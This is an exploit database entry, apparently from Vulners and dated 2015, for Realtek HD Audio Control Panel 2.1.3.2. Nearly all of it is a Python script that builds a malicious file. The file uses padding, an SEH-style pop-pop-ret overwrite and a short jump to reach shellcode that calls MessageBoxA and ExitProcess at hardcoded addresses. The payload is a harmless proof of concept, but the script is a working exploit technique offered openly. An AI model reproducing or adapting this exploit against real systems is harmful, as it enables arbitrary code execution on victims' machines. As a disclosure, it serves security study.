Realtek-HD-Audio-Control-Panel-2.1.3.2

🗓️ 07 Jan 2015 12:22:19Reported by BraniXType

Write exploit code to pop esi, ret, add and mov data, then trigger MessageBoxA and ExitProcess function

filepath = "C:\\ShellCode\\RTHDCPL 2.1.3.2 - Exploit.bin"
f = open(filepath, "wb")
 
f.write('A'*4)
f.write('\x5E')                     # pop esi
f.write('\x5E')                     # pop esi
f.write('\xC3')                     # ret
f.write('\x90')                     # nop
 
f.write('[BraniX]')
f.write('A'*448)                    # mock
 
f.write('\xEB\x06')                 # jmp +6
f.write('\x90')                     # nop
f.write('\x90')                     # nop
 
f.write('\x70\x01\xA5\x01')         # pop; pop; ret; address
 
f.write('\x83\xC1\x0C')             # add ecx, 0Ch
f.write('\x88\x01')                 # mov byte ptr [ecx], al
f.write('\x83\xE9\x08')             # sub ecx, 08
f.write('\x50')                     # push eax
f.write('\x51')                     # push ecx
f.write('\x51')                     # push ecx
f.write('\x50')                     # push eax
f.write('\xE8\xC5\x08\x27\x7E')     # call user32.MessageBoxA
 
f.write('\x50')                     # push eax
f.write('\xE8\xE7\xCB\x6E\x7C')     # call kernel32.ExitProcess
 
f.write('\xCC'*1500)                # int 3's
 
f.close()

07 Jan 2015 12:22Current

0.8Low risk

Vulners AI Score0.8